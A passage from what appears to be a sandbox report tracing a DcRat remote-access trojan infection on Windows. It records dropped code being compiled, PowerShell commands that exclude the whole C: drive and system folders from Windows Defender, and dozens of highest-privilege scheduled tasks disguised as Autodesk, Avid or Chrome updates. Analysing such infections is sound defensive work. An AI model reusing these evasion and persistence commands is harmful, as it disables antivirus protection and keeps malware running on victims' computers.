                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE62A.tmp" "c:\Windows\Offline Web Pages\CSC900854E547F64BA9BA5F6677A7DCA4C6.TMP"
                                                                8⤵
                                                                  PID:6064
                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zshwukfl\zshwukfl.cmdline"
                                                                7⤵
                                                                • Loads dropped DLL
                                                                PID:5920
                                                                • C:\Windows\System32\Conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  8⤵
                                                                  • Loads dropped DLL
                                                                  PID:5460
                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE6A7.tmp" "c:\Recovery\WindowsRE\CSCCA94746BC4B4DAAABE37F478E3AC2F.TMP"
                                                                  8⤵
                                                                    PID:2428
                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zcwcoi2o\zcwcoi2o.cmdline"
                                                                  7⤵
                                                                  • Loads dropped DLL
                                                                  PID:5148
                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE724.tmp" "c:\winNet\CSC1A8C12BA2E74DC9A354E4A5DE3D8DF.TMP"
                                                                    8⤵
                                                                      PID:6036
                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\et2v5dbr\et2v5dbr.cmdline"
                                                                    7⤵
                                                                    • Loads dropped DLL
                                                                    PID:6132
                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE7C0.tmp" "c:\winNet\CSC68D1384D58554C32A657F31260AE497.TMP"
                                                                      8⤵
                                                                        PID:3940
                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\14czcdqh\14czcdqh.cmdline"
                                                                      7⤵
                                                                      • Loads dropped DLL
                                                                      PID:5340
                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE82D.tmp" "c:\DriversavessessionDlldhcp\CSC529A69F43F404F45A07D9DA7CED4974B.TMP"
                                                                        8⤵
                                                                          PID:4148
                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\it5fruo2\it5fruo2.cmdline"
                                                                        7⤵
                                                                        • Loads dropped DLL
                                                                        PID:2932
                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE8AA.tmp" "c:\Users\Public\Pictures\CSCADF8F8D2E43E490FB01273118A29AAF.TMP"
                                                                          8⤵
                                                                            PID:3120
                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vq50egzt\vq50egzt.cmdline"
                                                                          7⤵
                                                                          • Loads dropped DLL
                                                                          PID:3276
                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE937.tmp" "c:\Users\Admin\Music\CSC11D95F71967E487190EC769BF9AFAFC1.TMP"
                                                                            8⤵
                                                                              PID:5648
                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\40hm2uzt\40hm2uzt.cmdline"
                                                                            7⤵
                                                                            • Loads dropped DLL
                                                                            • Drops file in System32 directory
                                                                            PID:5844
                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE9B4.tmp" "c:\Windows\System32\CSC1C63C8A6CABA4CA99DA1D3E2E9C2A79C.TMP"
                                                                              8⤵
                                                                                PID:4120
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:2824
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:1172
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:3888
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:3228
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:5444
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:5980
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:4520
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:1948
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:536
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:3668
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:2788
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:1364
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:1452
                                                                              • C:\Windows\System32\Conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                8⤵
                                                                                  PID:3972
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\taskhostw.exe'
                                                                                7⤵
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                PID:5596
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'
                                                                                7⤵
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                PID:4876
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xmjncdoCH4.bat"
                                                                                7⤵
                                                                                  PID:5400
                                                                                  • C:\Windows\system32\chcp.com
                                                                                    chcp 65001
                                                                                    8⤵
                                                                                      PID:6124
                                                                                    • C:\Windows\system32\w32tm.exe
                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                      8⤵
                                                                                        PID:6420
                                                                                      • C:\Users\Admin\AppData\Local\taskhostw.exe
                                                                                        "C:\Users\Admin\AppData\Local\taskhostw.exe"
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:6140
                                                                          • C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe"
                                                                            2⤵
                                                                            • Modifies WinLogon for persistence
                                                                            • Executes dropped EXE
                                                                            • Adds Run key to start application
                                                                            • Drops file in Windows directory
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:3576
                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                              "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" & exit
                                                                              3⤵
                                                                                PID:4724
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe"
                                                                                  4⤵
                                                                                  • DcRat
                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                  PID:4704
                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                3⤵
                                                                                  PID:3612
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                    4⤵
                                                                                    • DcRat
                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                    PID:3160
                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST & exit
                                                                                  3⤵
                                                                                    PID:3056
                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                      SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST
                                                                                      4⤵
                                                                                        PID:5396
                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                      3⤵
                                                                                        PID:2412
                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                          4⤵
                                                                                          • DcRat
                                                                                          PID:3720
                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                        3⤵
                                                                                          PID:4000
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                            4⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:6380
                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                          3⤵
                                                                                            PID:6648
                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                              4⤵
                                                                                              • DcRat
                                                                                              PID:6736
                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                            3⤵
                                                                                              PID:5244
                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                4⤵
                                                                                                • DcRat
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:2884
                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                              3⤵
                                                                                                PID:2472
                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                  4⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:2580
                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                3⤵
                                                                                                  PID:6240
                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                    4⤵
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:1548
                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                  3⤵
                                                                                                    PID:4804
                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                      4⤵
                                                                                                        PID:536
                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                      3⤵
                                                                                                        PID:1752
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                          4⤵
                                                                                                            PID:5208
                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                          3⤵
                                                                                                            PID:6124
                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                              4⤵
                                                                                                              • DcRat
                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                              PID:6380
                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                            3⤵
                                                                                                              PID:5496
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                4⤵
                                                                                                                • DcRat
                                                                                                                PID:6608
                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                              3⤵
                                                                                                                PID:5472
                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                  4⤵
                                                                                                                  • DcRat
                                                                                                                  PID:4652
                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                3⤵
                                                                                                                  PID:920
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                    4⤵
                                                                                                                    • DcRat
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:808
                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                  3⤵
                                                                                                                    PID:6284
                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                      4⤵
                                                                                                                        PID:1468
                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                      3⤵
                                                                                                                        PID:4900
                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                          4⤵
                                                                                                                          • DcRat
                                                                                                                          PID:1944
                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                        3⤵
                                                                                                                          PID:1308
                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                            4⤵
                                                                                                                              PID:6588
                                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                            3⤵
                                                                                                                              PID:4200
                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                4⤵
                                                                                                                                • DcRat
                                                                                                                                PID:6600
                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                              3⤵
                                                                                                                                PID:6580
                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                  4⤵
                                                                                                                                  • DcRat
                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                  PID:5468
                                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                3⤵
                                                                                                                                  PID:4144
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                    4⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:6628
                                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                  3⤵
                                                                                                                                    PID:5476
                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                      4⤵
                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                      PID:6468
                                                                                                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                    3⤵
                                                                                                                                      PID:5552
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                        4⤵
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:5340
                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                      3⤵
                                                                                                                                        PID:5756
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                          4⤵
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:5672
                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                        3⤵
                                                                                                                                          PID:7040
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                            4⤵
                                                                                                                                            • DcRat
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:3228
                                                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                          3⤵
                                                                                                                                            PID:6520
                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                              4⤵
                                                                                                                                                PID:2536
                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                              3⤵
                                                                                                                                                PID:5740
                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                                  4⤵
                                                                                                                                                  • DcRat
                                                                                                                                                  PID:3264
                                                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                                3⤵
                                                                                                                                                  PID:2732
                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                                    4⤵
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:5432
                                                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                                  3⤵
                                                                                                                                                    PID:5152
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                                      4⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      PID:680
                                                                                                                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                                    3⤵
                                                                                                                                                      PID:4988
                                                                                                                                                      • C:\Windows\system32\schtasks.exe
